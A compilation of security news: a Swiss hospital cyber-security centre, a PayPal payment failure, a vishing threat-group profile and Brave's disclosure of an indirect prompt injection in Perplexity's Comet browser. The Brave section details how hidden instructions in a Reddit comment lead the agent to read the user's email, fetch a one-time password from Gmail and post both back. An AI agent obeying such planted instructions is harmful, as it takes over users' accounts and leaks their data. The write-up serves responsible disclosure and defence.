www.swissinfo.ch August 28, 2025 - Swiss health groups found national cyber-security centre to warn against cyber attacks. The cantonal hospital authorities of Ticino and Graubünden are among the founders of the Healthcare Cyber Security Centre (H-CSC). The premise is that “hospitals are tempting targets for cybercriminals, since they handle large quantities of sensitive data,” said H-CSC as it was officially established in Thurgau. The initiative in Ticino was also joined by the Gruppo ospedaliero Moncucco, which brings together the Moncucco clinics in Lugano and Santa Chiara in Locarno, and a Graubünden foundation made up of health care associations, including the Thusis hospital. Founding members also include the university hospitals of Basel, Bern and Zurich, but not those of Geneva and Lausanne. French-speaking institutions are clearly under-represented – the Fribourg and Valais hospitals are the only members from this region. But H-CSC is set to grow. “Membership of the association will be open from 1 September 2025 to all hospitals with a public service mandate”. The H-CSC project was launched last year on the recommendation of the Federal Office for Cyber Security. The aim of the association is to offer tailor-made security services for hospitals in the field of cyber security. The H-CSC (https://www.h-csc.ch/) will serve as a platform to promote knowledge exchange and collaboration between hospitals, expand existing competencies and create synergies that will “sustainably strengthen their ability to prevent, detect and contain cyber incidents”, the association’s website states. Such incidents can “severely compromise the functioning (of hospitals), causing the postponement of surgeries, encryption and/or disclosure of sensitive patient data, or the inoperability of medical devices.”
Euro banks block 'unauthorized' PayPal direct debits
www.theregister.com 2025/08/28/ - US payments platform back in action, says it's informing affected customers Shoppers and merchants in Germany found themselves dealing with billions of euros in frozen transactions this week, thanks to an apparent failure in PayPal's fraud-detection systems. According to the Association of German Banks, the problem hit on Monday when banks noticed a slew of recent unauthorized direct debits from PayPal. The body said the banks responded in various ways, which is one way of putting it – the Süddeutsche Zeitung reported that some stopped all PayPal transactions, with the total number of frozen payments likely to be around €10 billion. A spokesperson for the German Savings Banks Association (DSGV), which represents hundreds of regional banks across the country, confirmed the issue to The Register. The DSGV said PayPal had assured it the problem was resolved, adding that PayPal payments had been running smoothly since Tuesday morning and the US payments platform was informing affected customers "directly." The DSGV said the unauthorized payments had a "significant impact on transactions throughout Europe, particularly in Germany." However, there have been no confirmed reports of the incident being felt outside Germany. Austrian media reported that the banks there had seen no problems. PayPal is the most popular method of online payment in Germany, having been used for 28.5 percent of online purchases last year, according to research by the EHI Retail Institute. (The next most popular option is buying on account.) That's largely down to PayPal's payment protection, which appeals to privacy-conscious Germans. In the wake of the unauthorized direct debit issue, financial industry consultant Peter Woeste Christensen told local media that PayPal's particular strength in Germany was partly thanks to the poor user experience of German banks' own apps. 
PayPal had not responded to The Register's request for comment at the time of publication, although SZ quoted a spokesperson as saying PayPal had quickly identified the cause and was working with banks to "ensure all accounts are updated." The US company referred to the incident as a "temporary service interruption." PayPal's reputational hit in Germany is likely to be exacerbated by last week's reports of hackers offering millions of PayPal credentials that they claimed PayPal had recently exposed in plaintext. The hackers' claims appear dubious, with PayPal denying any recent breach, but the reports gained significant traction in Germany. "It's possible that the data is incorrect or outdated," read a Wednesday advisory from the German consumer organization Stiftung Warentest, which bundled the leak report with this week's snafu. "Nonetheless, PayPal users should change their passwords as a precaution."
cstromblad.com Christoffer Strömblad Wednesday, August 27, 2025 - In this multi-source analysis I’ve attempted to fuse publicly available information about the UNC6040 group into one report and analysis to provide a better view of the activity cluster named UNC6040 (Google/Mandiant naming).

Executive Summary

UNC6040 represents a sophisticated financially motivated threat group that has emerged as a significant threat to organizations utilizing cloud-based customer relationship management systems. First identified by Google’s Threat Intelligence Group [1], this actor has been conducting voice phishing campaigns since at least December 2024 [2] to compromise Salesforce environments for large-scale data theft and extortion purposes.

The group has successfully breached approximately 20 organizations across hospitality, retail, and education sectors [3], demonstrating a clear preference for targets with substantial customer databases and valuable personally identifiable information. Perhaps most notably, the group successfully compromised Google’s own Salesforce environment through sophisticated OAuth token abuse [4], highlighting their capability to breach even well-defended organizations.

What distinguishes UNC6040 from traditional threat actors is their primary reliance on social engineering rather than technical exploitation. By impersonating IT support personnel through voice calls, they guide victims to authorize malicious connected apps, specifically modified versions of Salesforce’s Data Loader tool [1]. This approach effectively bypasses traditional security controls including multi-factor authentication, representing a fundamental shift in the threat landscape that security teams must address.

Threat Actor Profile and Victimology

UNC6040’s targeting reveals a calculated approach to victim selection. The group primarily focuses on luxury retailers, hospitality organizations, and educational institutions [3], with additional confirmed targeting of aviation, financial services, and technology companies [2]. This sector preference suggests a clear understanding of where high-value customer data concentrates and where cloud CRM adoption is mature.

The threat actor demonstrates varying levels of technical proficiency across different intrusions, with some operations achieving complete data extraction while others result in only partial exfiltration before detection [1]. This inconsistency may indicate either multiple operators with different skill levels or an evolving tradecraft as the group refines their techniques.

Intelligence suggests potential collaboration with other threat actors, particularly the ShinyHunters collective [4]. UNC6040 may engage in partnership models where initial compromise and data theft are followed by collaboration with specialized extortion groups months after the initial breach [1]. This delayed monetization strategy complicates attribution and incident response efforts.

Operational Capabilities and Techniques

The group’s attack methodology begins with extensive reconnaissance through automated phone systems and live calls where operators impersonate IT support staff [5][3]. This initial intelligence gathering phase allows them to understand organizational structures, identify key personnel, and develop credible pretexts for their social engineering approaches.

The technical implementation involves guiding victims to Salesforce’s connected app setup page where they authorize malicious applications using connection codes [1]. These modified Data Loader applications are often disguised with legitimate-sounding names such as “My Ticket Portal” to align with the social engineering narrative [1][3]. Once authorized, these applications provide API-level access enabling bulk data exfiltration through legitimate platform features.

Post-compromise activities extend beyond the initial Salesforce environment. The group demonstrates capability for lateral movement, targeting Okta, Microsoft 365, and Workplace environments to harvest additional credentials and expand their access [3][2]. They employ test queries before conducting full data extraction [1], suggesting a methodical approach to validating access and identifying high-value datasets.

The group’s data exfiltration focuses on customer PII including names, dates of birth, addresses, phone numbers, and account metadata [2]. By avoiding custom malware and instead relying on legitimate tools and platform features, they maintain a minimal forensic footprint that complicates detection and attribution efforts [2].

Infrastructure and Operational Security

UNC6040 demonstrates strong operational security practices, primarily accessing victim environments through Mullvad VPN IP addresses [1]. This VPN usage provides anonymity and complicates law enforcement efforts to track the group’s activities. The threat actors also utilize Okta phishing panels hosted on the same infrastructure as their vishing operations [1], suggesting a centralized approach to their technical infrastructure.

The group’s infrastructure choices reflect an understanding of modern detection capabilities and a deliberate effort to blend malicious activity with legitimate traffic patterns. By leveraging standard Salesforce API calls and OAuth workflows [4], they avoid triggering traditional security alerts focused on malware or anomalous network traffic.

Strategic Outlook and Future Developments

The success of UNC6040’s operations, including the high-profile breach of Google’s Salesforce environment [4], will likely inspire both evolution of their own tactics and adoption of similar techniques by other threat actors. In the near term, we assess with moderate confidence that the group will expand their targeting to additional cloud CRM platforms as organizations increase security awareness around Salesforce-specific threats.

The demonstrated collaboration between UNC6040 and groups like ShinyHunters [4] suggests a maturing criminal ecosystem where specialized actors collaborate to maximize the value extracted from compromised organizations. This partnership model is likely to expand, with UNC6040 potentially serving as an initial access broker for ransomware operations or other extortion groups.

The fundamental challenge posed by UNC6040 lies not in their technical sophistication but in their exploitation of human trust and legitimate platform features. As organizations implement phishing-resistant MFA and enhanced monitoring capabilities [5], the group will likely evolve their social engineering tactics and potentially shift toward supply chain targeting through managed service providers and cloud service integrators.

Looking forward, the convergence of voice-based social engineering with OAuth abuse and API-level data access represents a maturation of the threat landscape that traditional perimeter-based security models are poorly equipped to address. Organizations must anticipate continued activity from UNC6040 and similar groups, with potential escalation in both the scale of operations and the sophistication of social engineering techniques employed.

The shift from technical exploitation to identity-based attacks demonstrated by UNC6040 requires a fundamental reconsideration of security architectures. As legitimate platform features become the primary vector for data exfiltration, the distinction between authorized and malicious activity becomes increasingly nuanced, demanding behavioral analytics and continuous monitoring capabilities that many organizations currently lack.

[1] https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion/
[2] https://unit42.paloaltonetworks.com/retail-hospitality-heists-in-the-digital-age/
[3] https://www.varonis.com/blog/salesforce-vishing-threat-unc604
[4] https://guardz.com/blog/from-vishing-to-oauth-abuse-how-shinyhunters-compromised-the-cloud/
[5] https://cloud.google.com/blog/topics/threat-intelligence/technical-analysis-vishing-threats/
Agentic Browser Security: Indirect Prompt Injection in Perplexity Comet
brave.com blog Published Aug 20, 2025 - The attack we developed shows that traditional Web security assumptions don't hold for agentic AI, and that we need new security and privacy architectures for agentic browsing.

The threat of instruction injection

At Brave, we’re developing the ability for our in-browser AI assistant Leo to browse the Web on your behalf, acting as your agent. Instead of just asking “Summarize what this page says about London flights”, you can command: “Book me a flight to London next Friday.” The AI doesn’t just read, it browses and completes transactions autonomously. This will significantly expand Leo’s capabilities while preserving Brave’s privacy guarantees and maintaining robust security guardrails to protect your data and browsing sessions.

This kind of agentic browsing is incredibly powerful, but it also presents significant security and privacy challenges. As users grow comfortable with AI browsers and begin trusting them with sensitive data in logged in sessions—such as banking, healthcare, and other critical websites—the risks multiply. What if the model hallucinates and performs actions you didn’t request? Or worse, what if a benign-looking website or a comment left on a social media site could steal your login credentials or other sensitive data by adding invisible instructions for the AI assistant?

To compare our implementation with others, we examined several existing solutions, such as Nanobrowser and Perplexity’s Comet. While looking at Comet, we discovered vulnerabilities which we reported to Perplexity, and which underline the security challenges faced by agentic AI implementations in browsers. The attack demonstrates how easy it is to manipulate AI assistants into performing actions that were prevented by long-standing Web security techniques, and how users need new security and privacy protections in agentic browsers.
The vulnerability we’re discussing in this post lies in how Comet processes webpage content: when users ask it to “Summarize this webpage,” Comet feeds a part of the webpage directly to its LLM without distinguishing between the user’s instructions and untrusted content from the webpage. This allows attackers to embed indirect prompt injection payloads that the AI will execute as commands. For instance, an attacker could gain access to a user’s emails from a prepared piece of text in a page in another tab.

How the attack works

- Setup: An attacker embeds malicious instructions in Web content through various methods. On websites they control, attackers might hide instructions using white text on white backgrounds, HTML comments, or other invisible elements. Alternatively, they may inject malicious prompts into user-generated content on social media platforms such as Reddit comments or Facebook posts.
- Trigger: An unsuspecting user navigates to this webpage and uses the browser’s AI assistant feature, for example clicking a “Summarize this page” button or asking the AI to extract key points from the page.
- Injection: As the AI processes the webpage content, it sees the hidden malicious instructions. Unable to distinguish between the content it should summarize and instructions it should not follow, the AI treats everything as user requests.
- Exploit: The injected commands instruct the AI to use its browser tools maliciously, for example navigating to the user’s banking site, extracting saved passwords, or exfiltrating sensitive information to an attacker-controlled server.

This attack is an example of an indirect prompt injection: the malicious instructions are embedded in external content (like a website, or a PDF) that the assistant processes as part of fulfilling the user’s request.
Attack demonstration

To illustrate the severity of this vulnerability in Comet, we created a proof-of-concept demonstration. In this demonstration, you can see:

- A user visits a Reddit post, with a comment containing the prompt injection instructions hidden behind the spoiler tag.
- The user clicks the Comet browser’s “Summarize the current webpage” button.
- While processing the page for summarization, the Comet AI assistant sees and processes these hidden instructions.
- The malicious instructions command the Comet AI to:
  - Navigate to https://www.perplexity.ai/account/details and extract the user’s email address
  - Navigate to https://www.perplexity.ai./account and log in with this email address to receive an OTP (one-time password) from Perplexity (note that the trailing dot creates a different domain, perplexity.ai. vs perplexity.ai, to bypass existing authentication)
  - Navigate to https://gmail.com, where the user is already logged in, and read the received OTP
  - Exfiltrate both the email address and the OTP by replying to the original Reddit comment
- The attacker learns the victim’s email address, and can take over their Perplexity account using the exfiltrated OTP and email address combination.

Once the user tries to summarize the Reddit post with the malicious comment in Comet, the attack happens without any further user input.

Impact and implications

This attack presents significant challenges to existing Web security mechanisms. When an AI assistant follows malicious instructions from untrusted webpage content, traditional protections such as same-origin policy (SOP) or cross-origin resource sharing (CORS) are all effectively useless. The AI operates with the user’s full privileges across authenticated sessions, providing potential access to banking accounts, corporate systems, private emails, cloud storage, and other services.
Unlike traditional Web vulnerabilities that typically affect individual sites or require complex exploitation, this attack enables cross-domain access through simple, natural language instructions embedded in websites. The malicious instructions could even be included in user-generated content on a website the attacker doesn’t control (for example, attack instructions hidden in a Reddit comment). The attack is both indirect in interaction, and browser-wide in scope.

The attack we developed shows that traditional Web security assumptions don’t hold for agentic AI, and that we need new security and privacy architectures for agentic browsing.

Possible mitigations

In our analysis, we came up with the following strategies which could have prevented attacks of this nature. We’ll discuss this topic more fully in the next blog post in this series.

The browser should distinguish between user instructions and website content

The browser should clearly separate the user’s instructions from the website’s contents when sending them as context to the backend. The contents of the page should always be treated as untrusted. Note that once the model on the backend gets passed both the trusted user request and the untrusted page contents, its output must be treated as potentially unsafe.

The model should check user-alignment for tasks

Based upon the task and the context, the model comes up with actions for the browser to take; these actions should be treated as “potentially unsafe” and should be independently checked for alignment against the user’s requests. This is related to the previous point about differentiating between the user’s requests (trusted) and the contents of the page (always untrusted).

Security and privacy sensitive actions should require user interaction

No matter the prior agent plan and tasks, the model should require explicit user interaction for security and privacy-sensitive tasks.
For example: sending an email should always prompt the user to confirm right before the email is sent, and an agent should never automatically click through a TLS connection error interstitial.

The browser should isolate agentic browsing from regular browsing

Agentic browsing is an inherently powerful-but-risky mode for the user to be in, as this attack demonstrates. It should be impossible for the user to “accidentally” end up in this mode while casually browsing. Does the browser really need the ability to open your email account, send emails, and read sensitive data from every logged-in site if all you’re trying to do is summarize Reddit discussions? As with all things in the browser, permissions should be as minimal as possible. Powerful agentic capabilities should be isolated from regular browsing tasks, and this difference should be intuitively obvious to the user. This clean separation is especially important in these early days of agentic security, as browser vendors are still working out how to prevent security and privacy attacks. In future posts, we’ll cover more about how we are working towards a safer agentic browsing experience with fine-grained permissions.

Disclosure timeline

- July 25, 2025: Vulnerability discovered and reported to Perplexity
- July 27, 2025: Perplexity acknowledged the vulnerability and implemented an initial fix
- July 28, 2025: Retesting revealed the fix was incomplete; additional details and comments were provided to Perplexity
- August 11, 2025: One-week public disclosure notice sent to Perplexity
- August 13, 2025: Final testing confirmed the vulnerability appears to be patched
- August 20, 2025: Public disclosure of vulnerability details

(Update: on further testing after this blog post was released, we learned that Perplexity still hasn’t fully mitigated the kind of attack described here. We’ve re-reported this to them.)
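The mitigations listed under "Possible mitigations" above can be combined into a deterministic gate that sits between the model's proposed actions and the browser tools. The following is an added sketch, not code from Brave or Perplexity; the action shape, the mode names, the SENSITIVE list and the Reddit URL are assumptions made for illustration.

```javascript
// Added example: policy gate between model output and browser tools.
// Action shape, mode names and SENSITIVE are assumptions of this sketch.
const SENSITIVE = new Set(["send_email", "submit_form", "post_comment"]);

// Canonical host: lower-case, trailing dots removed, so "perplexity.ai."
// and "perplexity.ai" are compared as one site. Returns null if unparsable.
function canonicalHost(url) {
  try {
    return new URL(url).hostname.toLowerCase().replace(/\.+$/, "");
  } catch {
    return null;
  }
}

// User request and page text travel in separate, labelled fields; the page
// text is never concatenated into the instruction channel.
function buildContext(userRequest, pageText) {
  return {
    instruction: { source: "user", trusted: true, text: userRequest },
    content: { source: "page", trusted: false, text: pageText },
  };
}

// Decide what happens to one model-proposed action: "allow", "confirm"
// (ask the user first) or "deny". Model output is treated as unsafe.
function reviewAction(action, session) {
  const host = canonicalHost(action.url);
  if (host === null) return "deny";
  const tabHost = canonicalHost(session.tabUrl);
  if (session.mode === "read_only") {
    // Summarising: only reading the tab the user is looking at.
    return action.type === "read_page" && host === tabHost ? "allow" : "deny";
  }
  if (SENSITIVE.has(action.type)) return "confirm";
  const inScope = host === tabHost || session.userNamedHosts.includes(host);
  return inScope ? "allow" : "confirm";
}

// Constructed action plan mirroring the steps of the demonstration above.
const plan = [
  { type: "read_page", url: "https://www.reddit.com/r/example/comments/1" },
  { type: "navigate", url: "https://www.perplexity.ai./account" },
  { type: "navigate", url: "https://gmail.com/" },
  { type: "post_comment", url: "https://www.reddit.com/r/example/comments/1" },
];
const summarise = { mode: "read_only", tabUrl: plan[0].url, userNamedHosts: [] };
const agentic = { mode: "agentic", tabUrl: plan[0].url, userNamedHosts: [] };
console.log(plan.map((a) => reviewAction(a, summarise)));
console.log(plan.map((a) => reviewAction(a, agentic)));
```

In read-only mode every step after reading the page is refused, and in agentic mode each cross-site navigation and the reply are held for user confirmation because the user never named those hosts.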
Research Motivation

We believe strongly in raising the privacy and security bar across the board for agentic browsing. A safer Web is good for everyone. As we saw, giving an agent authority to act on the Web, especially within a user’s authenticated context, carries significant security and privacy risks. Our goal with this research is to surface those risks early and demonstrate practical defenses. This helps Brave, Perplexity, other browsers, and (most importantly) all users. We look forward to collaborating with Perplexity and the broader browser and AI communities on hardening agentic AI and, where appropriate, standardizing s...